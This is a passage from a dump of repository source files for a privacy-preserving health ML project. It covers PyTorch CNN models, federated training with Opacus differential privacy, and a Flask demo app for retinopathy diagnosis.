"blob_id": "28be7f0500aeca1c5450dbd0d07a7fccae3c2892",
"content_id": "8017e104215cb0e0aaca10bb411959119b44e99d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 600,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 20,
"path": "/CSPP1/M5/p1/perfect_cube.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Write a python program to find if the given number is a perfect cube or not\"\"\"\n# using guess and check algorithm\n# testcase 1\n# Input: 24389\n# Output: 24389 is a perfect cube\n# testcase 2\n# Input: 21950\n# Output: 21950 is not a perfect cube\ndef main():\n \"\"\" # input is captured in in_p \"\"\"\n input_1 = int(input())\n cube_root = 0\n while cube_root**3 < input_1:\n cube_root = cube_root + 1\n if cube_root**3 != abs(input_1):\n print(str(input_1) + ' is not a perfect cube')\n else:\n print(str(input_1) + ' is a perfect cube')\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.352769672870636,
"alphanum_fraction": 0.3804664611816406,
"avg_line_length": 21.129032135009766,
"blob_id": "e19d1196e88ee35918185c1a9646904d05b8f2e7",
"content_id": "14a3d76e9a2fe2b95a12a5d4b1a733c6687afcfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 686,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 31,
"path": "/CSPP1/M6/p3/digit_product.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nGiven a number n, find the product of all the digits\nexample:\n input: 123\n output: 6\n'''\ndef main():\n '''\n Read any number from the input, store it in variable n.\n '''\n n_um = int(input())\n r_em = 0\n m_ul = 1\n if n_um == 0:\n m_ul = 0\n else:\n if n_um > 0:\n while n_um > 0:\n r_em = n_um % 10\n m_ul = m_ul * r_em\n n_um = n_um // 10\n else:\n n_um = abs(n_um)\n while n_um > 0:\n r_em = n_um % 10\n m_ul = m_ul * r_em\n n_um = n_um // 10\n m_ul = -m_ul\n print(m_ul)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4390243887901306,
"alphanum_fraction": 0.45528456568717957,
"avg_line_length": 18.5,
"blob_id": "2298950f0e05a26e7fd515987675f35c194bd074",
"content_id": "09ba8d1d8b45b37e03c88691237087e40857221d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 6,
"path": "/CSPP1/New folder/m7prac.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "def is_even(i):\n \"\"\" Even check \"\"\"\n i = int(input())\n print(\"hi\")\n return i % 2 == 0\nprint (is_even(i))\n \n "
},
{
"alpha_fraction": 0.4574187994003296,
"alphanum_fraction": 0.4837576746940613,
"avg_line_length": 30.52777862548828,
"blob_id": "f57a8beaa2c7a9b68f86a33d4cdc75707e6712bf",
"content_id": "3844596b6c3cd8329fdeda38b517000437472dcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1139,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 36,
"path": "/CSPP1/M5/GuessMyNumber/guess_my_number.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"NUMBER\"\"\"\ndef main():\n\n \"\"\"guess number\"\"\"\n\n print(\"Please think of a number between 0 and 100!\")\n a_1 = 0\n b_1 = 100\n c_1 = int((a_1 + b_1) / 2)\n print(\"Is your secret number \", c_1)\n print(\"put h for high,put l for low,put c for correct\")\n y_input = input()\n while y_input != 'c':\n if y_input == 'h':\n b_1 = c_1\n c_1 = int((a_1 + b_1) / 2)\n print(\"Is your secret number\", c_1)\n print(\"put h for high, put l for low, put c for correct\")\n y_input = input()\n\n if y_input == 'l':\n a_1 = c_1\n c_1 = int((a_1 + b_1) / 2)\n print(\"Is your secret number\", c_1)\n print(\"put h for high,put l for low, put c for correct\")\n y_input = input()\n\n else:\n print(\"sorry i did not understand the input\")\n print(\"put h for high,put l for low, put c for correct\")\n y_input = input()\n if y_input == 'c':\n print(\"put h for high,put l for low, put c for correct\")\n print(\"Game over. Your secret number\", c_1)\nif __name__ == \"__main__\":\n main()\n "
},
{
"alpha_fraction": 0.596256673336029,
"alphanum_fraction": 0.6122994422912598,
"avg_line_length": 17.700000762939453,
"blob_id": "e7dfd052755ee5abe935a4f79718f46c452b27f2",
"content_id": "89d2b0e98f32c914ab0e0cfb724924d7c00a0cf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 20,
"path": "/CSPP1/M22/assignment3/tokenize.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nWrite a function to tokenize a given string and return a dictionary with the frequency of\neach word\n'''\n\nimport re\ndef tokenize(string):\n dict1 = {}\n for x in dictionary:\n dict1[x] = dict1.get(x,0) + 1\n return dict1\n\ndef main():\n lines = int(input())\n dictionary = input().split\n print(tokenize(string))\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.46875,
"alphanum_fraction": 0.53125,
"avg_line_length": 10.800000190734863,
"blob_id": "178625877bbae1dae29d6e34f78a410676db5ae5",
"content_id": "017ec17b60e09ed608e8d461b724df5f1f4bd54c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 5,
"path": "/CSPP1/M3/iterate_even_reverse1.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "print(\"print Hello!\")\nn=10\nwhile n>0:\n print(n)\n n=n-2\n \n\n"
},
{
"alpha_fraction": 0.5441176295280457,
"alphanum_fraction": 0.6029411554336548,
"avg_line_length": 21.33333396911621,
"blob_id": "e2ccfbaf83592a476e1068af7c00e237514f474f",
"content_id": "50eb6ab38ab6e47f229af52db5d2dfe98c03d0a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 68,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/CSPP1/M3/iterate_even_reverse.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "print(\"print Hello!\")\nfor n in range(10,0,-2):\n print(\"print\",n)\n\n"
},
{
"alpha_fraction": 0.5673469305038452,
"alphanum_fraction": 0.5755102038383484,
"avg_line_length": 24.789474487304688,
"blob_id": "ec42b1eb03f0d2c22fc6b84a70d979acde0d1931",
"content_id": "ddbae9d7d8dfb7dfe39935fc36d97eeef36bfea3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/CSPP1/M4/p2/bob_counter.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''Assume s is a string of lower case characters.\nWrite a program that prints the number of times the string 'bob'\noccurs in s. For example, if s = 'azcbobobegghakl', then your\nprogram should print\n\nNumber of times bob occurs is: 2'''\n\ndef main():\n \"\"\"defining main Subset \"\"\"\n v_a = input()\n #input string S\n v_b = 'bob'\n c_o = 0\n for i in range(len(v_a)):\n if v_b == v_a[i:i+3]:\n c_o = c_o + 1\n print(str(c_o))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.48302870988845825,
"alphanum_fraction": 0.4934725761413574,
"avg_line_length": 21.58823585510254,
"blob_id": "854b9531266f39518477ea97ec10e8e015be1a13",
"content_id": "4a45ff8f867bcbb63aaf14f6e99ad0f0af4b4d9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 383,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 17,
"path": "/CSPP1/M15/Inheritance-Exercise on genPrimes/gen_primes.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "def genPrimes():\n number = 2\n prime = True\n while True:\n if prime == True:\n yield number\n number = number + 1\n for i in range(2,number):\n if number % i == 0:\n prime = False\n break\n else:\n prime = True\nn = int(input())\nprimenumber = genPrimes()\nfor i in range(n):\n print(primenumber.__next__())"
},
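Driving the prime generator above by hand (e.g. pasted into a REPL alongside the function) shows the yield/trial-division loop in action:

```python
primes = genPrimes()
print([next(primes) for _ in range(5)])  # [2, 3, 5, 7, 11]
```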
{
"alpha_fraction": 0.47278910875320435,
"alphanum_fraction": 0.5102040767669678,
"avg_line_length": 18.600000381469727,
"blob_id": "a16ae8a9c0d6c434e69ad45bd951024fa07d1392",
"content_id": "7221e6ebefb9efd689cebf504d04fe22662430a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 15,
"path": "/CSPP1/New folder/m5a5.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Test case\"\"\"\ndef main():\n\tx = 25\n\tepsilon = 0.01\n\tstep = 0.1\n\tguess = 0.0\n\twhile guess <= x:\n\t\tif abs(guess**2 -x) >= epsilon:\n\t\t\tguess += step\n if abs(guess**2 - x) >= epsilon:\n \tprint('failed')\n else:\n print('succeeded: ' + str(guess))\nif__name__ == \"__main__\":\n main()\n"
}
] | 29 |
BridgeYao2022/private-ml-for-health
|
https://github.com/BridgeYao2022/private-ml-for-health
|
413a50bb496cbdaa93c15bf9648be2c4e24b2a23
|
c77181d0628b3a04c411a01f7e402fccb4d34e09
|
92f7590bb74d17726b23296fb113a1c954005f5c
|
refs/heads/main
| 2023-07-29T14:10:11.652455 | 2021-09-13T18:02:36 | 2021-09-13T18:02:36 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4322616159915924,
"alphanum_fraction": 0.5141522288322449,
"avg_line_length": 37.712764739990234,
"blob_id": "bbdd039aeb7cfc148c593090b888c2bb4c63f91a",
"content_id": "8de9f6a72a170e92edf7aa9dbec9006d57a30aa6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3639,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 94,
"path": "/private_training/src_secure_aggregation/models.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "from torch import nn\nimport torch.nn.functional as F\n\nclass CNNMnist(nn.Module):\n def __init__(self, args):\n super(CNNMnist, self).__init__()\n self.conv1 = nn.Conv2d(args.num_channels, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, args.num_classes)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = F.relu(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = F.relu(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = F.relu(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n\nclass CNNFashion_Mnist(nn.Module):\n def __init__(self, args):\n super(CNNFashion_Mnist, self).__init__()\n self.conv1 = nn.Conv2d(args.num_channels, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, args.num_classes)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = F.relu(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = F.relu(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = F.relu(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\nclass CNNCifar(nn.Module):\n def __init__(self, args):\n super(CNNCifar, self).__init__()\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(6, 16, 5)\n self.fc1 = nn.Linear(16 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, args.num_classes)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = x.view(-1, 16 * 5 * 5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return F.log_softmax(x, dim=1)\n\n# class modelC(nn.Module):\n# def __init__(self, input_size, **kwargs):\n# super(modelC, self).__init__()\n# self.conv1 = nn.Conv2d(input_size, 96, 3, padding=1)\n# self.conv2 = nn.Conv2d(96, 96, 3, padding=1)\n# self.conv3 = nn.Conv2d(96, 96, 3, padding=1, stride=2)\n# self.conv4 = nn.Conv2d(96, 192, 3, padding=1)\n# self.conv5 = nn.Conv2d(192, 192, 3, padding=1)\n# self.conv6 = nn.Conv2d(192, 192, 3, padding=1, stride=2)\n# self.conv7 = nn.Conv2d(192, 192, 3, padding=1)\n# self.conv8 = nn.Conv2d(192, 192, 1)\n\n# self.class_conv = nn.Conv2d(192, args.num_classes, 1)\n\n\n# def forward(self, x):\n# x_drop = F.dropout(x, .2)\n# conv1_out = F.relu(self.conv1(x_drop))\n# conv2_out = F.relu(self.conv2(conv1_out))\n# conv3_out = F.relu(self.conv3(conv2_out))\n# conv3_out_drop = F.dropout(conv3_out, .5)\n# conv4_out = F.relu(self.conv4(conv3_out_drop))\n# conv5_out = F.relu(self.conv5(conv4_out))\n# conv6_out = F.relu(self.conv6(conv5_out))\n# conv6_out_drop = F.dropout(conv6_out, .5)\n# conv7_out = F.relu(self.conv7(conv6_out_drop))\n# conv8_out = F.relu(self.conv8(conv7_out))\n\n# class_out = F.relu(self.class_conv(conv8_out))\n# pool_out = F.adaptive_avg_pool2d(class_out, 1)\n# pool_out.squeeze_(-1)\n# pool_out.squeeze_(-1)\n# return pool_out\n"
},
{
"alpha_fraction": 0.6797698736190796,
"alphanum_fraction": 0.6836050152778625,
"avg_line_length": 29.676469802856445,
"blob_id": "61d01ecbf4a3c31f420508b10ca758e10a392947",
"content_id": "68ea99065440e92d51c00bae7afd9e96cc501d29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1043,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 34,
"path": "/private_inference/app/app.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import os\nimport matplotlib.image as mpimg\nfrom flask import Flask, render_template, request, redirect\nfrom PIL import Image\nimport io\nfrom inference import get_prediction\nfrom commons import format_class_name, transform_image\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms, models\nimport pickle\nimport time\nimport json\n\napp = Flask(__name__)\[email protected]('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n return redirect(request.url)\n file = request.files.get('file')\n if not file:\n return\n img_bytes = file.read()\n file_tensor = transform_image(image_bytes=img_bytes) #######\n class_name = get_prediction(file_tensor)\n return render_template('result.html', class_name=class_name)\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(debug=True, port=int(os.environ.get('PORT', 5000)))\n"
},
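`app.py` depends on a `transform_image` helper from `commons.py`, which this record does not include. A plausible minimal version, assuming standard torchvision preprocessing; the resize/crop sizes here are placeholders chosen to match the 3×224×224 input used elsewhere in the repo, not confirmed values:

```python
import io
from PIL import Image
from torchvision import transforms

def transform_image(image_bytes):
    # Decode the uploaded bytes, apply an eval-time pipeline, add a batch dim.
    preprocess = transforms.Compose([
        transforms.Resize(256),       # placeholder size
        transforms.CenterCrop(224),   # placeholder, matches (3, 224, 224)
        transforms.ToTensor(),
    ])
    image = Image.open(io.BytesIO(image_bytes)).convert('RGB')
    return preprocess(image).unsqueeze(0)
```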
{
"alpha_fraction": 0.5414749383926392,
"alphanum_fraction": 0.5519915819168091,
"avg_line_length": 38.010257720947266,
"blob_id": "318c78b96dd085798fad927c8c230492b00186eb",
"content_id": "c95109a72361a259c2d718356f13a4b87a2e69d9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7607,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 195,
"path": "/private_training/src/federated_main_s4.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import os\nimport copy\nimport time\nimport pickle\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom torchsummary import summary\n\nfrom options import args_parser\nfrom update_s4 import LocalUpdate\nfrom utils import test_inference\nfrom models import CNNMnistRelu, CNNMnistTanh\nfrom models import CNNFashion_MnistRelu, CNNFashion_MnistTanh\nfrom models import CNNCifar10Relu, CNNCifar10Tanh\nfrom utils import average_weights, exp_details\nfrom datasets import get_dataset\nfrom torchvision import models\nfrom logging_results import logging\n\nfrom opacus.dp_model_inspector import DPModelInspector\nfrom opacus.utils import module_modification\nfrom opacus import PrivacyEngine\n\n\nif __name__ == '__main__':\n \n ############# Common ###################\n args = args_parser() \n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu' \n \n # load dataset and user groups\n train_dataset, test_dataset, user_groups = get_dataset(args)\n\n \n # BUILD MODEL\n if args.model == 'cnn':\n # Convolutional neural netork\n if args.dataset == 'mnist':\n if args.activation == 'relu':\n global_model = CNNMnistRelu()\n elif args.activation == 'tanh':\n global_model = CNNMnistTanh()\n global_model.to(device)\n summary(global_model, input_size=(1, 28, 28), device=device)\n elif args.dataset == 'fmnist':\n if args.activation == 'relu':\n global_model = CNNFashion_MnistRelu()\n elif args.activation == 'tanh':\n global_model = CNNFashion_MnistTanh()\n global_model.to(device)\n summary(global_model, input_size=(1, 28, 28), device=device)\n elif args.dataset == 'cifar10':\n # global_model = models.resnet18(num_classes=10) \n if args.activation == 'relu':\n global_model = CNNCifar10Relu()\n elif args.activation == 'tanh':\n global_model = CNNCifar10Tanh()\n global_model.to(device)\n summary(global_model, input_size=(3, 32, 32), device=device)\n elif args.dataset == 'dr': \n global_model = models.squeezenet1_1(pretrained=True) \n global_model.classifier[1] = nn.Conv2d(512, 5, kernel_size=(1,1), stride=(1,1))\n global_model.num_classes = 5\n global_model.to(device)\n summary(global_model, input_size=(3, 224, 224), device=device)\n else:\n exit('Error: unrecognized model')\n ############# Common ###################\n\n ######### DP Model Compatibility #######\n if args.withDP:\n try:\n inspector = DPModelInspector()\n inspector.validate(global_model)\n print(\"Model's already Valid!\\n\")\n except:\n global_model = module_modification.convert_batchnorm_modules(global_model)\n inspector = DPModelInspector()\n print(f\"Is the model valid? {inspector.validate(global_model)}\")\n print(\"Model is convereted to be Valid!\\n\") \n ######### DP Model Compatibility #######\n\n \n\n ######### Local Models and Optimizers #############\n local_models = []\n local_optimizers = []\n local_privacy_engine = []\n\n for u in range(args.num_users):\n local_models.append(copy.deepcopy(global_model))\n\n if args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(local_models[u].parameters(), lr=args.lr, \n momentum=args.momentum) \n elif args.optimizer == 'adam':\n optimizer = torch.optim.Adam(local_models[u].parameters(), lr=args.lr) \n\n if args.withDP:\n # This part is buggy intentionally. 
It makes privacy engine avoid giving error with vhp.\n \n privacy_engine = PrivacyEngine(\n local_models[u],\n batch_size = int(len(train_dataset)*args.sampling_prob), \n sample_size = len(train_dataset), \n alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),\n noise_multiplier = args.noise_multiplier/np.sqrt(args.num_users),\n max_grad_norm = args.max_grad_norm,\n )\n\n privacy_engine.attach(optimizer) \n local_privacy_engine.append(privacy_engine)\n\n local_optimizers.append(optimizer)\n\n\n if args.optimizer == 'sgd':\n g_optimizer = torch.optim.SGD(global_model.parameters(), lr=args.lr, \n momentum=args.momentum) \n elif args.optimizer == 'adam':\n g_optimizer = torch.optim.Adam(global_model.parameters(), lr=args.lr) \n if args.withDP:\n local_dataset_size = int(len(train_dataset)/args.num_users)\n actual_train_ds_size = local_dataset_size*args.num_users\n global_privacy_engine = PrivacyEngine(\n global_model,\n batch_size = int(actual_train_ds_size*args.sampling_prob),\n sample_size = actual_train_ds_size,\n alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),\n noise_multiplier = args.noise_multiplier,\n max_grad_norm = args.max_grad_norm) \n global_privacy_engine.attach(g_optimizer)\n ######## Local Models and Optimizers #############\n\n # Training\n train_loss = []\n test_log = []\n epsilon_log = []\n \n print(\"Avg batch_size: \", int(actual_train_ds_size*args.sampling_prob))\n\n for epoch in range(args.epochs): \n ## Sample the users ## \n idxs_users = np.random.choice(range(args.num_users),\n max(int(args.frac * args.num_users), 1),\n replace=False)\n #####\n local_weights, local_losses = [], [] \n \n\n for u in idxs_users:\n \n torch.cuda.empty_cache()\n\n local_model = LocalUpdate(args=args, dataset=train_dataset, \n u_id=u, idxs=user_groups[u], \n sampling_prob=args.sampling_prob,\n optimizer = local_optimizers[u])\n\n w, loss, local_optimizers[u] = local_model.update_weights(\n model=local_models[u],\n global_round=epoch)\n local_weights.append(copy.deepcopy(w))\n local_losses.append(copy.deepcopy(loss))\n \n\n # update global weights\n global_weights = average_weights(local_weights)\n\n # update global weights\n global_model.load_state_dict(global_weights)\n for u in range(args.num_users):\n local_models[u].load_state_dict(global_weights)\n\n if epoch !=0 and epoch%30==0:\n torch.cuda.empty_cache() \n loss_avg = sum(local_losses) / len(local_losses) \n train_loss.append(loss_avg)\n\n _acc, _loss = test_inference(args, global_model, test_dataset) \n test_log.append([_acc, _loss]) \n \n if args.withDP:\n global_privacy_engine.steps = epoch+1\n epsilons, _ = global_privacy_engine.get_privacy_spent(args.delta) \n epsilon_log.append([epsilons])\n else:\n epsilon_log = None\n\n logging(args, epoch, train_loss, test_log, epsilon_log)\n print(global_privacy_engine.steps)\n"
},
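The per-user noise multiplier above is the central one divided by the square root of the number of users. A minimal NumPy sketch (with hypothetical values for `num_users` and `noise_multiplier`) of why the summed per-user noise then matches the central multiplier:

```python
import numpy as np

num_users = 10            # hypothetical, stands in for args.num_users
noise_multiplier = 1.15   # hypothetical central (target) multiplier
local_sigma = noise_multiplier / np.sqrt(num_users)

# Each user adds N(0, local_sigma^2) noise per coordinate; the sum of the
# num_users independent contributions has std sqrt(num_users) * local_sigma,
# i.e. the central noise multiplier again.
noise = np.random.normal(0.0, local_sigma, size=(num_users, 1_000_000))
print(noise.sum(axis=0).std())  # ~= 1.15
```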
{
"alpha_fraction": 0.7933723330497742,
"alphanum_fraction": 0.7933723330497742,
"avg_line_length": 67.4000015258789,
"blob_id": "f6e3da41c1a9fd0641ae496c4cc0e9f993f9269c",
"content_id": "bdc8d8a519f6d594c298922f67eadec2b64723f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1026,
"license_type": "permissive",
"max_line_length": 391,
"num_lines": 15,
"path": "/private_inference/ReadME.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "# Private Inference\n\nThis section contains the source code for a Proof-of-Concept demo app that patients can use to get their diagnosis, provided they possess a digital copy of their scan. Images from the diabetic retinopathy dataset can be uploaded to this app, and a diagnosis is returned within seconds, reducing the resources that hospitals would spend diagnosing patients who are not at risk of vision loss.\n\n## Deployed App Demo\n\nThe demo app has been deployed on heroku on the followinng link: https://imperial-diagnostics.herokuapp.com.\n\n## App Source Code\n\nThe folder `app/` contains code for a demo app that patients can use to get their diagnosis, provided they possess a digital copy of their scan.\n\nThe app can launched locally by downloading the folder and running `python app.py`. The app will accept any image from the diabetic retinopathy dataset as input (a few example inputs are provided in the folder) and will produce an output, as per the demo video below:\n\n\n"
},
{
"alpha_fraction": 0.5059511065483093,
"alphanum_fraction": 0.5115776062011719,
"avg_line_length": 39.543861389160156,
"blob_id": "674a91491871c5707ddf2a3f897380ccdc80f624",
"content_id": "d334a51fd805266e79ef828ea904c3db5e0c41aa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4621,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 114,
"path": "/private_training/src/update_s3.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\nimport numpy as np\nfrom opacus import PrivacyEngine\n\n\nclass DatasetSplit(Dataset):\n \"\"\"An abstract Dataset class wrapped around Pytorch Dataset class.\n \"\"\"\n\n def __init__(self, dataset, idxs):\n self.dataset = dataset\n self.idxs = [int(i) for i in idxs]\n\n def __len__(self):\n return len(self.idxs)\n\n def __getitem__(self, item):\n image, label = self.dataset[self.idxs[item]]\n return image.clone().detach(), torch.tensor(label)\n\n\nclass LocalUpdate(object):\n def __init__(self, args, dataset, u_id, idxs):\n self.u_id = u_id\n self.args = args\n self.trainloader, self.testloader = self.train_val_test(\n dataset, list(idxs))\n self.device = 'cuda' if args.gpu else 'cpu'\n self.criterion = nn.CrossEntropyLoss().to(self.device)\n self.dataset_size = len(idxs)\n\n def train_val_test(self, dataset, idxs):\n \"\"\"\n Returns train and test dataloaders for a given dataset\n and user indexes.\n \"\"\"\n _split = 0\n if self.args.local_test_split > 0.0:\n _split = max(int(np.round((self.args.local_test_split)*len(idxs))), 1)\n \n idxs_train = idxs[_split:] \n trainloader = DataLoader(DatasetSplit(dataset, idxs_train),\n batch_size=self.args.local_bs,\n shuffle=True, drop_last=True) \n testloader = None\n if _split > 0:\n idxs_test = idxs[:_split]\n testloader = DataLoader(DatasetSplit(dataset, idxs_test),\n batch_size=int(len(idxs_test)), shuffle=False)\n return trainloader, testloader\n ###########\n\n \n def update_weights(self, model, global_round, u_step=0):\n # Set mode to train model\n model.train()\n epoch_loss = []\n \n if self.args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(model.parameters(), lr=self.args.lr, \n momentum=self.args.momentum) \n elif self.args.optimizer == 'adam':\n optimizer = torch.optim.Adam(model.parameters(), lr=self.args.lr) \n\n if self.args.withDP:\n privacy_engine = PrivacyEngine(\n model,\n batch_size = self.args.virtual_batch_size,\n sample_size = self.dataset_size,\n alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),\n noise_multiplier = self.args.noise_multiplier,\n max_grad_norm = self.args.max_grad_norm,\n )\n \n privacy_engine.attach(optimizer) \n privacy_engine.steps = u_step\n\n for iter in range(self.args.local_ep): \n batch_loss = []\n optimizer.zero_grad()\n if self.args.withDP:\n virtual_batch_rate = int(self.args.virtual_batch_size / self.args.local_bs) \n for batch_idx, (images, labels) in enumerate(self.trainloader): \n images, labels = images.to(self.device), labels.to(self.device)\n model_preds = model(images)\n loss = self.criterion(model_preds, labels)\n loss.backward()\n \n if self.args.withDP:\n # take a real optimizer step after N_VIRTUAL_STEP steps t \n if ((batch_idx + 1) % virtual_batch_rate == 0) or ((batch_idx + 1) == len(self.trainloader)):\n optimizer.step()\n optimizer.zero_grad() \n else: \n optimizer.virtual_step() # take a virtual step \n else:\n optimizer.step()\n optimizer.zero_grad()\n #############\n batch_loss.append(loss.item())\n \n epoch_loss.append(sum(batch_loss)/len(batch_loss))\n\n if self.args.withDP: \n epsilon, best_alpha = optimizer.privacy_engine.get_privacy_spent(self.args.delta) \n return model.state_dict(), sum(epoch_loss) / len(epoch_loss), optimizer.privacy_engine.steps, epsilon \n \n return model.state_dict(), sum(epoch_loss) / len(epoch_loss), 0., 0."
},
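The virtual-step logic above emulates a large batch by accumulating several small ones. A minimal plain-PyTorch sketch of the same accumulation pattern (hypothetical model and batch sizes; with a PrivacyEngine attached, the non-stepping iterations would call `optimizer.virtual_step()`):

```python
import torch
from torch import nn

# Hypothetical sizes; update_s3.py derives virtual_batch_rate from
# args.virtual_batch_size / args.local_bs.
model = nn.Linear(10, 2)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
criterion = nn.CrossEntropyLoss()
virtual_batch_rate = 4  # accumulate 4 small batches into one "virtual" batch

batches = [(torch.randn(8, 10), torch.randint(0, 2, (8,))) for _ in range(10)]

optimizer.zero_grad()
for batch_idx, (x, y) in enumerate(batches):
    loss = criterion(model(x), y)
    loss.backward()  # gradients accumulate across backward() calls
    if ((batch_idx + 1) % virtual_batch_rate == 0) or ((batch_idx + 1) == len(batches)):
        optimizer.step()       # one real step per virtual batch
        optimizer.zero_grad()
    # with Opacus attached, an else-branch would call optimizer.virtual_step()
```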
{
"alpha_fraction": 0.745843231678009,
"alphanum_fraction": 0.7727632522583008,
"avg_line_length": 28.325580596923828,
"blob_id": "ee2a3338a3d8c3f79f3dc8533e8001518e820151",
"content_id": "28bafeb447c738df5dac65c4eb3c9da01371b8be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1263,
"license_type": "permissive",
"max_line_length": 234,
"num_lines": 43,
"path": "/private_training/build_pyseal.sh",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
